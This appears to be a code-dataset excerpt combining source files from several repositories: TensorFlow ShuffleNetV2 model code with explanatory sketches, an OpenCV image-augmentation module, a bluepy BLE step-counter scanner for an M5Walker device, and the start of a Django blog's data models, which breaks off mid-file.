x = tf.squeeze(x, axis=1)
x=tf.identity(x,name='cls_output')
return x
```
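If the reshape/transpose sequence in `shuffle()` is read carefully, the non-deploy branch amounts to handing the even-indexed channels to one branch and the odd-indexed channels to the other (a two-group channel shuffle followed by a split). A NumPy sketch of that reading, offered as an illustration rather than a bit-exact replica:
```python
import numpy as np

def shuffle_split_np(z):
    # z is NHWC; return the even- and odd-indexed channel halves.
    return z[..., 0::2], z[..., 1::2]

z = np.arange(2 * 4 * 4 * 8, dtype=np.float32).reshape(2, 4, 4, 8)
x, y = shuffle_split_np(z)
print(x.shape, y.shape)  # (2, 4, 4, 4) each; x gets channels 0,2,4,..., y gets 1,3,5,...
```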
#### File: net/shufflenet/shufflenetv2.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
from train_config import config as cfg
def torch_style_padding(inputs,kernel_size,rate=1):
'''
    By default TensorFlow uses a different padding scheme from PyTorch,
    so we need to do explicit padding before conv or pool operations.
:param inputs:
:param kernel_size:
:param rate:
:return:
'''
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
inputs = tf.pad(inputs,
[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])
return inputs
def shuffle(z):
# with tf.name_scope('shuffle_split'):
# shape = tf.shape(z)
# batch_size = shape[0]
# height, width = z.shape[1].value, z.shape[2].value
#
# depth = z.shape[3].value
#
# if cfg.MODEL.deployee:
# z = tf.reshape(z, [ height, width, 2, depth//2]) # shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 3, 2])
#
# else:
# z = tf.reshape(z, [batch_size, height, width, 2, depth//2])# shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 2, 4, 3])
#
# z = tf.reshape(z, [batch_size, height, width, depth])
# x, y = tf.split(z, num_or_size_splits=2, axis=3)
# return x, y
with tf.name_scope('shuffle_split'):
z=tf.transpose(z,perm=[0,3,1,2])
shape = tf.shape(z)
batch_size = shape[0]
height, width = z.shape[2].value, z.shape[3].value
depth = z.shape[1].value
if cfg.MODEL.deployee:
z = tf.reshape(z,[batch_size * depth // 2, 2, height * width]) # shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1, 0, 2])
z = tf.reshape(z, [batch_size*2, depth // 2, height, width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
else:
z = tf.reshape(z, [batch_size*depth//2,2, height* width])# shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1,0,2])
z = tf.reshape(z, [batch_size*2, depth // 2, height , width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
return x, y
def ShuffleV2Block(old_x,inp, oup, base_mid_channels, ksize, stride,scope_index=0):
main_scope_list=[['0','3','5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
]
project_scope_list=[['0','2'],
None,
None,
None,
['0', '2'],
None,
None,
None,
None,
None,
None,
None,
['0', '2'], #16
None,
None,
None,
]
main_scope=main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
if stride==1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
act_func=tf.nn.relu
##branch main
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
biases_initializer=None,
scope='branch_main/'+main_scope[0])
x = torch_style_padding(x, ksize)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
if stride == 2:
x_proj = torch_style_padding(x_proj, ksize)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[0])
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[1])
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5,
batch_norm_scale=True,
use_batch_norm=True,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Defines the default ResNet arg scope.
TODO(gpapan): The batch-normalization related default values above are
appropriate for use in conjunction with the reference ResNet models
released at https://github.com/KaimingHe/deep-residual-networks. When
training ResNets from scratch, they might need to be tuned.
Args:
weight_decay: The weight decay to use for regularizing the model.
batch_norm_decay: The moving average decay when estimating layer activation
statistics in batch normalization.
batch_norm_epsilon: Small constant to prevent division by zero when
normalizing activations by their variance in batch normalization.
batch_norm_scale: If True, uses an explicit `gamma` multiplier to scale the
activations in the batch normalization layer.
activation_fn: The activation function which is used in ResNet.
use_batch_norm: Whether or not to use batch normalization.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
An `arg_scope` to use for the resnet models.
"""
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'updates_collections': batch_norm_updates_collections,
'fused': True, # Use fused batch norm if possible.
}
with slim.arg_scope(
[slim.conv2d,slim.separable_conv2d],
weights_regularizer=slim.l2_regularizer(weight_decay),
weights_initializer=slim.variance_scaling_initializer(),
biases_initializer=None,
normalizer_fn=slim.batch_norm if use_batch_norm else None,
normalizer_params=batch_norm_params):
with slim.arg_scope([slim.batch_norm], **batch_norm_params):
# The following implies padding='SAME' for pool1, which makes feature
# alignment easier for dense prediction tasks. This is also used in
# https://github.com/facebook/fb.resnet.torch. However the accompanying
# code of 'Deep Residual Learning for Image Recognition' uses
# padding='VALID' for pool1. You can switch to that choice by setting
# slim.arg_scope([slim.max_pool2d], padding='VALID').
with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc
def ShufflenetV2(inputs,is_training=True,model_size=cfg.MODEL.size,include_head=False,keep_prob=1.):
stage_repeats = [4, 8, 4]
model_size = model_size
if model_size == '0.5x':
stage_out_channels = [-1, 24, 48, 96, 192, 1024]
elif model_size == '1.0x':
stage_out_channels = [-1, 24, 116, 232, 464, 1024]
elif model_size == '1.5x':
stage_out_channels = [-1, 24, 176, 352, 704, 1024]
elif model_size == '2.0x':
stage_out_channels = [-1, 24, 244, 488, 976, 2048]
else:
raise NotImplementedError
fms = []
arg_scope = shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor)
with slim.arg_scope(arg_scope):
with slim.arg_scope([slim.batch_norm, slim.dropout], is_training=is_training):
with tf.variable_scope('ShuffleNetV2'):
input_channel = stage_out_channels[1]
inputs=torch_style_padding(inputs,3)
net = slim.conv2d(inputs,
24,
[3, 3],
stride=2,
padding='VALID',
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
scope='first_conv/0')
net = torch_style_padding(net, 3)
net = slim.max_pool2d(net,kernel_size=3,stride=2,padding='VALID')
fms = []
feature_cnt=0
for idxstage in range(len(stage_repeats)):
numrepeat = stage_repeats[idxstage]
output_channel = stage_out_channels[idxstage + 2]
for i in range(numrepeat):
with tf.variable_scope('features/%d' % (feature_cnt)):
if i == 0:
net=ShuffleV2Block(net,input_channel, output_channel,
base_mid_channels=output_channel // 2, ksize=3, stride=2,scope_index=feature_cnt)
else:
net=ShuffleV2Block(net,input_channel // 2, output_channel,
base_mid_channels=output_channel // 2, ksize=3, stride=1,scope_index=feature_cnt)
input_channel = output_channel
feature_cnt+=1
fms.append(net)
if not include_head:
return fms
if include_head:
x = slim.conv2d(net,
num_outputs=stage_out_channels[-1],
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
scope='conv_last/0')
x=tf.reduce_mean(x,axis=[1,2],keep_dims=True)
if model_size == '2.0x' :
keep_prob=0.8
if keep_prob<1.:
x=slim.dropout(x,keep_prob)
x=slim.conv2d(x,
num_outputs=cfg.MODEL.cls,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=None,
normalizer_fn=None,
scope='classifier/0')
x = tf.squeeze(x, axis=1)
x = tf.squeeze(x, axis=1)
x = tf.identity(x,name='cls_output')
return x
```
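The `torch_style_padding` helper keeps TensorFlow's convolutions aligned with the PyTorch reference weights by padding symmetrically before a 'VALID' conv. The arithmetic it performs, worked through for a few kernel sizes:
```python
# Same padding arithmetic as torch_style_padding(), evaluated for a few kernels.
for kernel_size, rate in [(3, 1), (5, 1), (7, 1), (3, 2)]:
    kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
    pad_total = kernel_size_effective - 1
    pad_beg = pad_total // 2
    pad_end = pad_total - pad_beg
    print(f'k={kernel_size} rate={rate} -> pad=({pad_beg}, {pad_end})')
# k=3 -> (1, 1), k=5 -> (2, 2), k=7 -> (3, 3), dilated k=3 rate=2 -> (2, 2)
```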
#### File: dataset/augmentor/augmentation.py
```python
import numbers
import os
import warnings
import numpy as np
import cv2
import random
import math
from train_config import config as cfg
###### May be wrong; check it before use
def Rotate_aug(src,angle,label=None,center=None,scale=1.0):
'''
:param src: src image
:param label: label should be numpy array with [[x1,y1],
[x2,y2],
[x3,y3]...]
:param angle:
:param center:
:param scale:
:return: the rotated image and the points
'''
image=src
(h, w) = image.shape[:2]
    # if no rotation center is specified, use the image center
if center is None:
center = (w / 2, h / 2)
    # perform the rotation
M = cv2.getRotationMatrix2D(center, angle, scale)
if label is None:
for i in range(image.shape[2]):
image[:,:,i] = cv2.warpAffine(image[:,:,i], M, (w, h),
flags=cv2.INTER_CUBIC,
borderMode=cv2.BORDER_CONSTANT,
borderValue=0.)
return image,None
else:
label=label.T
####make it as a 3x3 RT matrix
full_M=np.row_stack((M,np.asarray([0,0,1])))
img_rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,
borderMode=cv2.BORDER_CONSTANT, borderValue=cfg.DATA.PIXEL_MEAN)
###make the label as 3xN matrix
full_label = np.row_stack((label, np.ones(shape=(1,label.shape[1]))))
label_rotated=np.dot(full_M,full_label)
label_rotated=label_rotated[0:2,:]
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return img_rotated,label_rotated
def Rotate_coordinate(label,rt_matrix):
if rt_matrix.shape[0]==2:
rt_matrix=np.row_stack((rt_matrix, np.asarray([0, 0, 1])))
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(rt_matrix, full_label)
label_rotated = label_rotated[0:2, :]
return label_rotated
def box_to_point(boxes):
'''
:param boxes: [n,x,y,x,y]
:return: [4n,x,y]
'''
##caution the boxes are ymin xmin ymax xmax
points_set=np.zeros(shape=[4*boxes.shape[0],2])
for i in range(boxes.shape[0]):
points_set[4 * i]=np.array([boxes[i][0],boxes[i][1]])
points_set[4 * i+1] =np.array([boxes[i][0],boxes[i][3]])
points_set[4 * i+2] =np.array([boxes[i][2],boxes[i][3]])
points_set[4 * i+3] =np.array([boxes[i][2],boxes[i][1]])
return points_set
def point_to_box(points):
boxes=[]
points=points.reshape([-1,4,2])
for i in range(points.shape[0]):
box=[np.min(points[i][:,0]),np.min(points[i][:,1]),np.max(points[i][:,0]),np.max(points[i][:,1])]
boxes.append(box)
return np.array(boxes)
def Rotate_with_box(src,angle,boxes=None,center=None,scale=1.0):
'''
:param src: src image
:param label: label should be numpy array with [[x1,y1],
[x2,y2],
[x3,y3]...]
:param angle:angel
:param center:
:param scale:
:return: the rotated image and the points
'''
label=box_to_point(boxes)
image=src
(h, w) = image.shape[:2]
    # if no rotation center is specified, use the image center
if center is None:
center = (w / 2, h / 2)
    # perform the rotation
M = cv2.getRotationMatrix2D(center, angle, scale)
new_size=Rotate_coordinate(np.array([[0,w,w,0],
[0,0,h,h]]), M)
new_h,new_w=np.max(new_size[1])-np.min(new_size[1]),np.max(new_size[0])-np.min(new_size[0])
scale=min(h/new_h,w/new_w)
M = cv2.getRotationMatrix2D(center, angle, scale)
if boxes is None:
for i in range(image.shape[2]):
image[:,:,i] = cv2.warpAffine(image[:,:,i], M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_CONSTANT)
return image,None
else:
label=label.T
####make it as a 3x3 RT matrix
full_M=np.row_stack((M,np.asarray([0,0,1])))
img_rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_CONSTANT)
###make the label as 3xN matrix
full_label = np.row_stack((label, np.ones(shape=(1,label.shape[1]))))
label_rotated=np.dot(full_M,full_label)
label_rotated=label_rotated[0:2,:]
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
boxes_rotated = point_to_box(label_rotated)
return img_rotated,boxes_rotated
###CAUTION:its not ok for transform with label for perspective _aug
def Perspective_aug(src,strength,label=None):
image = src
pts_base = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])
pts1=np.random.rand(4, 2)*random.uniform(-strength,strength)+pts_base
pts1=pts1.astype(np.float32)
#pts1 =np.float32([[56, 65], [368, 52], [28, 387], [389, 398]])
M = cv2.getPerspectiveTransform(pts1, pts_base)
trans_img = cv2.warpPerspective(image, M, (src.shape[1], src.shape[0]))
label_rotated=None
if label is not None:
label=label.T
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(M, full_label)
label_rotated=label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return trans_img,label_rotated
def Affine_aug(src,strength,label=None):
image = src
pts_base = np.float32([[10,100],[200,50],[100,250]])
pts1 = np.random.rand(3, 2) * random.uniform(-strength, strength) + pts_base
pts1 = pts1.astype(np.float32)
M = cv2.getAffineTransform(pts1, pts_base)
trans_img = cv2.warpAffine(image, M, (image.shape[1], image.shape[0]) ,
borderMode=cv2.BORDER_CONSTANT,
borderValue=cfg.DATA.PIXEL_MEAN)
label_rotated=None
if label is not None:
label=label.T
full_label = np.row_stack((label, np.ones(shape=(1, label.shape[1]))))
label_rotated = np.dot(M, full_label)
#label_rotated = label_rotated.astype(np.int32)
label_rotated=label_rotated.T
return trans_img,label_rotated
def Padding_aug(src,max_pattern_ratio=0.05):
src=src.astype(np.float32)
pattern=np.ones_like(src)
ratio = random.uniform(0, max_pattern_ratio)
height,width,_=src.shape
if random.uniform(0,1)>0.5:
if random.uniform(0, 1) > 0.5:
pattern[0:int(ratio*height),:,:]=0
else:
pattern[height-int(ratio * height):, :, :] = 0
else:
if random.uniform(0, 1) > 0.5:
pattern[:,0:int(ratio * width), :] = 0
else:
pattern[:,width-int(ratio * width):, :] = 0
bias_pattern=(1-pattern)*cfg.DATA.PIXEL_MEAN
img=src*pattern+bias_pattern
img=img.astype(np.uint8)
return img
def Blur_heatmaps(src, ksize=(3, 3)):
for i in range(src.shape[2]):
src[:, :, i] = cv2.GaussianBlur(src[:, :, i], ksize, 0)
        amin, amax = src[:, :, i].min(), src[:, :, i].max()  # find the min and max values
if amax>0:
            src[:, :, i] = (src[:, :, i] - amin) / (amax - amin)  # normalize: (value - min) / (max - min)
return src
def Blur_aug(src,ksize=(3,3)):
for i in range(src.shape[2]):
src[:, :, i]=cv2.GaussianBlur(src[:, :, i],ksize,1.5)
return src
def Img_dropout(src,max_pattern_ratio=0.05):
width_ratio = random.uniform(0, max_pattern_ratio)
height_ratio = random.uniform(0, max_pattern_ratio)
width=src.shape[1]
height=src.shape[0]
block_width=width*width_ratio
block_height=height*height_ratio
width_start=int(random.uniform(0,width-block_width))
width_end=int(width_start+block_width)
height_start=int(random.uniform(0,height-block_height))
height_end=int(height_start+block_height)
src[height_start:height_end,width_start:width_end,:]=0.
return src
def Fill_img(img_raw,target_height,target_width,label=None):
    ### sometimes used in object detection
channel=img_raw.shape[2]
raw_height = img_raw.shape[0]
raw_width = img_raw.shape[1]
if raw_width / raw_height >= target_width / target_height:
shape_need = [int(target_height / target_width * raw_width), raw_width, channel]
img_fill = np.zeros(shape_need, dtype=img_raw.dtype)+np.array(cfg.DATA.PIXEL_MEAN ,dtype=img_raw.dtype)
shift_x=(img_fill.shape[1]-raw_width)//2
shift_y=(img_fill.shape[0]-raw_height)//2
for i in range(channel):
img_fill[shift_y:raw_height+shift_y, shift_x:raw_width+shift_x, i] = img_raw[:,:,i]
else:
shape_need = [raw_height, int(target_width / target_height * raw_height), channel]
img_fill = np.zeros(shape_need, dtype=img_raw.dtype)+np.array(cfg.DATA.PIXEL_MEAN ,dtype=img_raw.dtype)
shift_x = (img_fill.shape[1] - raw_width) // 2
shift_y = (img_fill.shape[0] - raw_height) // 2
for i in range(channel):
img_fill[shift_y:raw_height + shift_y, shift_x:raw_width + shift_x, i] = img_raw[:, :, i]
if label is None:
return img_fill,shift_x,shift_y
else:
label[:,0]+=shift_x
label[:, 1]+=shift_y
return img_fill,label
class RandomResizedCrop(object):
### torch_convert codes
"""Crop the given PIL Image to random size and aspect ratio.
A crop of random size (default: of 0.08 to 1.0) of the original size and a random
aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop
is finally resized to given size.
This is popularly used to train the Inception networks.
Args:
size: expected output size of each edge
scale: range of size of the origin size cropped
ratio: range of aspect ratio of the origin aspect ratio cropped
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. / 3.)):
if isinstance(size, (tuple, list)):
self.size = size
else:
self.size = (size, size)
if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):
warnings.warn("range should be of kind (min, max)")
self.scale = scale
self.ratio = ratio
@staticmethod
def get_params(img, scale, ratio):
"""Get parameters for ``crop`` for a random sized crop.
Args:
img (PIL Image): Image to be cropped.
scale (tuple): range of size of the origin size cropped
ratio (tuple): range of aspect ratio of the origin aspect ratio cropped
Returns:
tuple: params (i, j, h, w) to be passed to ``crop`` for a random
sized crop.
"""
width, height = img.shape[1],img.shape[0]
area = height * width
for _ in range(10):
target_area = random.uniform(*scale) * area
log_ratio = (math.log(ratio[0]), math.log(ratio[1]))
aspect_ratio = math.exp(random.uniform(*log_ratio))
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < w <= width and 0 < h <= height:
i = random.randint(0, height - h)
j = random.randint(0, width - w)
return i, j, h, w
# Fallback to central crop
in_ratio = float(width) / float(height)
if (in_ratio < min(ratio)):
w = width
h = int(round(w / min(ratio)))
elif (in_ratio > max(ratio)):
h = height
w = int(round(h * max(ratio)))
else: # whole image
w = width
h = height
i = (height - h) // 2
j = (width - w) // 2
return i, j, h, w
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped and resized.
Returns:
PIL Image: Randomly cropped and resized image.
"""
i, j, h, w = self.get_params(img, self.scale, self.ratio)
target_img = img[i:i + h, j:j + w, :]
interp_methods = [cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_NEAREST,
cv2.INTER_LANCZOS4]
interp_method = random.choice(interp_methods)
target_img = cv2.resize(target_img, (self.size[1], self.size[0]), interpolation=interp_method)
return target_img
class CenterCrop(object):
"""Crops the given PIL Image at the center.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __init__(self, target_size,resize_size=256):
if isinstance(target_size, numbers.Number):
self.size = (int(target_size), int(target_size))
else:
self.size = target_size
self.resizer=OpencvResize(resize_size)
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
img=self.resizer(img)
image_width, image_height = img.shape[1],img.shape[0]
crop_height, crop_width = self.size[0],self.size[1]
crop_top = int(round((image_height - crop_height) / 2.))
crop_left = int(round((image_width - crop_width) / 2.))
center_croped_img=img[crop_top:crop_top+crop_height,crop_left:crop_left+crop_width,:]
return center_croped_img
def __repr__(self):
return self.__class__.__name__ + '(size={0})'.format(self.size)
class OpencvResize(object):
def __init__(self, size=256):
self.size = size
def __call__(self, img):
img = np.ascontiguousarray(img)
H, W, _ = img.shape
target_size = (int(self.size/H * W + 0.5), self.size) if H < W else (self.size, int(self.size/W * H + 0.5))
img = cv2.resize(img, target_size, interpolation=cv2.INTER_LINEAR)
img = np.ascontiguousarray(img)
return img
def box_in_img(img,boxes,min_overlap=0.5):
raw_bboxes = np.array(boxes)
face_area=(boxes[:,3]-boxes[:,1])*(boxes[:,2]-boxes[:,0])
h,w,_=img.shape
boxes[:, 0][boxes[:, 0] <=0] =0
boxes[:, 0][boxes[:, 0] >=w] = w
boxes[:, 2][boxes[:, 2] <= 0] = 0
boxes[:, 2][boxes[:, 2] >= w] = w
boxes[:, 1][boxes[:, 1] <= 0] = 0
boxes[:, 1][boxes[:, 1] >= h] = h
boxes[:, 3][boxes[:, 3] <= 0] = 0
boxes[:, 3][boxes[:, 3] >= h] = h
boxes_in = []
for i in range(boxes.shape[0]):
box=boxes[i]
if ((box[3]-box[1])*(box[2]-box[0]))/face_area[i]>min_overlap :
boxes_in.append(boxes[i])
boxes_in = np.array(boxes_in)
return boxes_in
def Random_scale_withbbox(image,bboxes,target_shape,jitter=0.5):
###the boxes is in ymin,xmin,ymax,xmax mode
hi, wi, _ = image.shape
while 1:
if len(bboxes)==0:
            print('warning: empty bboxes passed to Random_scale_withbbox')
bboxes_=np.array(bboxes)
crop_h = int(hi * random.uniform(0.2, 1))
crop_w = int(wi * random.uniform(0.2, 1))
start_h = random.randint(0, hi - crop_h)
start_w = random.randint(0, wi - crop_w)
croped = image[start_h:start_h + crop_h, start_w:start_w + crop_w, :]
bboxes_[:, 0] = bboxes_[:, 0] - start_w
bboxes_[:, 1] = bboxes_[:, 1] - start_h
bboxes_[:, 2] = bboxes_[:, 2] - start_w
bboxes_[:, 3] = bboxes_[:, 3] - start_h
bboxes_fix=box_in_img(croped,bboxes_)
if len(bboxes_fix)>0:
break
###use box
h,w=target_shape
croped_h,croped_w,_=croped.shape
croped_h_w_ratio=croped_h/croped_w
rescale_h=int(h * random.uniform(0.5, 1))
rescale_w = int(rescale_h/(random.uniform(0.7, 1.3)*croped_h_w_ratio))
rescale_w=np.clip(rescale_w,0,w)
image=cv2.resize(croped,(rescale_w,rescale_h))
new_image=np.zeros(shape=[h,w,3],dtype=np.uint8)
dx = int(random.randint(0, w - rescale_w))
dy = int(random.randint(0, h - rescale_h))
new_image[dy:dy+rescale_h,dx:dx+rescale_w,:]=image
bboxes_fix[:, 0] = bboxes_fix[:, 0] * rescale_w/ croped_w+dx
bboxes_fix[:, 1] = bboxes_fix[:, 1] * rescale_h / croped_h+dy
bboxes_fix[:, 2] = bboxes_fix[:, 2] * rescale_w / croped_w+dx
bboxes_fix[:, 3] = bboxes_fix[:, 3] * rescale_h / croped_h+dy
return new_image,bboxes_fix
def Random_flip(im, boxes):
im_lr = np.fliplr(im).copy()
h,w,_ = im.shape
xmin = w - boxes[:,2]
xmax = w - boxes[:,0]
boxes[:,0] = xmin
boxes[:,2] = xmax
return im_lr, boxes
def Mirror(src,label=None,symmetry=None):
img = cv2.flip(src, 1)
if label is None:
return img,None
width=img.shape[1]
cod = []
allc = []
for i in range(label.shape[0]):
x, y = label[i][0], label[i][1]
if x >= 0:
x = width - 1 - x
cod.append((x, y))
# **** the joint index depends on the dataset ****
for (q, w) in symmetry:
cod[q], cod[w] = cod[w], cod[q]
for i in range(label.shape[0]):
allc.append(cod[i][0])
allc.append(cod[i][1])
label = np.array(allc).reshape(label.shape[0], 2)
return img,label
def produce_heat_maps(label,map_size,stride,sigma):
def produce_heat_map(center,map_size,stride,sigma):
grid_y = map_size[0] // stride
grid_x = map_size[1] // stride
start = stride / 2.0 - 0.5
y_range = [i for i in range(grid_y)]
x_range = [i for i in range(grid_x)]
xx, yy = np.meshgrid(x_range, y_range)
xx = xx * stride + start
yy = yy * stride + start
d2 = (xx - center[0]) ** 2 + (yy - center[1]) ** 2
exponent = d2 / 2.0 / sigma / sigma
heatmap = np.exp(-exponent)
am = np.amax(heatmap)
if am > 0:
heatmap /= am / 255.
return heatmap
all_keypoints = label
point_num = all_keypoints.shape[0]
heatmaps_this_img=np.zeros([map_size[0]//stride,map_size[1]//stride,point_num])
for k in range(point_num):
heatmap = produce_heat_map([all_keypoints[k][0],all_keypoints[k][1]], map_size, stride, sigma)
heatmaps_this_img[:,:,k]=heatmap
return heatmaps_this_img
def visualize_heatmap_target(heatmap):
map_size=heatmap.shape[0:2]
frame_num = heatmap.shape[2]
heat_ = np.zeros([map_size[0], map_size[1]])
for i in range(frame_num):
heat_ = heat_ + heatmap[:, :, i]
cv2.namedWindow('heat_map', 0)
cv2.imshow('heat_map', heat_)
cv2.waitKey(0)
def produce_heatmaps_with_bbox(image,label,h_out,w_out,num_klass,ksize=9,sigma=0):
heatmap=np.zeros(shape=[h_out,w_out,num_klass])
h,w,_=image.shape
for single_box in label:
if single_box[4]>=0:
####box center (x,y)
center=[(single_box[0]+single_box[2])/2/w,(single_box[1]+single_box[3])/2/h] ###0-1
heatmap[round(center[1]*h_out),round(center[0]*w_out),int(single_box[4]) ]=1.
heatmap = cv2.GaussianBlur(heatmap, (ksize,ksize), sigma)
am = np.amax(heatmap)
if am>0:
heatmap /= am / 255.
heatmap=np.expand_dims(heatmap,-1)
return heatmap
def produce_heatmaps_with_keypoint(image,label,h_out,w_out,num_klass,ksize=7,sigma=0):
heatmap=np.zeros(shape=[h_out,w_out,num_klass])
h,w,_=image.shape
for i in range(label.shape[0]):
single_point=label[i]
if single_point[0]>0 and single_point[1]>0:
heatmap[int(single_point[1]*(h_out-1)),int(single_point[0]*(w_out-1)),i ]=1.
heatmap = cv2.GaussianBlur(heatmap, (ksize,ksize), sigma)
am = np.amax(heatmap)
if am>0:
heatmap /= am / 255.
return heatmap
if __name__=='__main__':
pass
``` |
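A quick round-trip check for the `box_to_point` / `point_to_box` helpers above. The import path is assumed from the file location, and it presumes the script is run from the repository root so that `train_config` resolves.
```python
import numpy as np
from lib.dataset.augmentor.augmentation import box_to_point, point_to_box

boxes = np.array([[10., 20., 110., 220.],
                  [5., 5., 50., 60.]])
corners = box_to_point(boxes)         # (8, 2): four corner points per box
recovered = point_to_box(corners)     # back to (2, 4)
print(np.allclose(recovered, boxes))  # True for axis-aligned boxes
```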
{
"source": "610t/reBoundBlocker",
"score": 2
} |
#### File: reBoundBlocker/BLE/Get_from_M5Walker.py
```python
from bluepy.btle import Peripheral, DefaultDelegate, Scanner, BTLEException, UUID
import bluepy.btle
import sys
import struct
from datetime import datetime
import argparse
import time
total_step=0
last_step=0
last_seq=0
devs = {
'M5Walker': {'companyID': 'ffff'}
}
target = 'M5Walker'
Debugging = False
def DBG(*args):
if Debugging:
msg = " ".join([str(a) for a in args])
print(msg)
sys.stdout.flush()
Verbose = True
def MSG(*args):
if Verbose:
msg = " ".join([str(a) for a in args])
print(msg)
sys.stdout.flush()
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
self.lastseq = None
self.lasttime = datetime.fromtimestamp(0)
def handleDiscovery(self, dev, isNewDev, isNewData):
if isNewDev or isNewData:
for (adtype, desc, value) in dev.getScanData():
DBG(adtype, desc, value)
if target in ('M5Walker'):
if desc == 'Manufacturer' and value[0:4] == devs[target]['companyID']:
delta = datetime.now() - self.lasttime
                    if value[4:6] != self.lastseq and delta.total_seconds() > 11:  # discard readings whose seq was incremented by a measurement during the 10-second advertising window
global last_seq, total_step, last_step
seq = int(value[4:6], 16)
if seq < last_seq:
total_step += last_step
last_seq = seq
DBG("Seq:", self.lastseq)
self.lasttime = datetime.now()
DBG("Time:", self.lasttime)
DBG("Value:",value[6:10],bytes.fromhex(value[6:10]))
step = struct.unpack('<h', bytes.fromhex(value[6:10]))[0]
print("Step:", str(step+total_step))
sys.stdout.flush()
last_step = step
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d',action='store_true', help='debug msg on')
args = parser.parse_args(sys.argv[1:])
global Debugging
Debugging = args.d
bluepy.btle.Debugging = args.d
global target
print(target)
scanner = Scanner().withDelegate(ScanDelegate())
while True:
try:
            scanner.scan(5.0)  # scan; handling of discovered devices is delegated to ScanDelegate
except BTLEException:
MSG('BTLE Exception while scannning.')
if __name__ == "__main__":
main()
``` |
{
"source": "610yilingliu/blog_for_fun",
"score": 2
} |
#### File: myblog/myblog/models.py
```python
from django.db import models
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length = 100,unique=True)
def __str__(self):
return self.name
class Tag(models.Model):
name = models.CharField(max_length = 50,unique=True)
def __str__(self):
return self.name
class Language(models.Model):
name = models.CharField(max_length = 10,unique=True)
def __str__(self):
return self.name
class Article(models.Model):
title = models.CharField(max_length = 100,unique=True)
body = models.TextField()
create_time = models.DateTimeField()
modify_time = models.DateTimeField()
tags = models.ManyToManyField(Tag)
summary = models.CharField(max_length = 300, blank = True)
## if no CASCADE, there will be an error while migrating database.
category = models.ForeignKey(Category, on_delete = models.CASCADE)
language = models.ForeignKey(Language, on_delete = models.CASCADE)
def __str__(self):
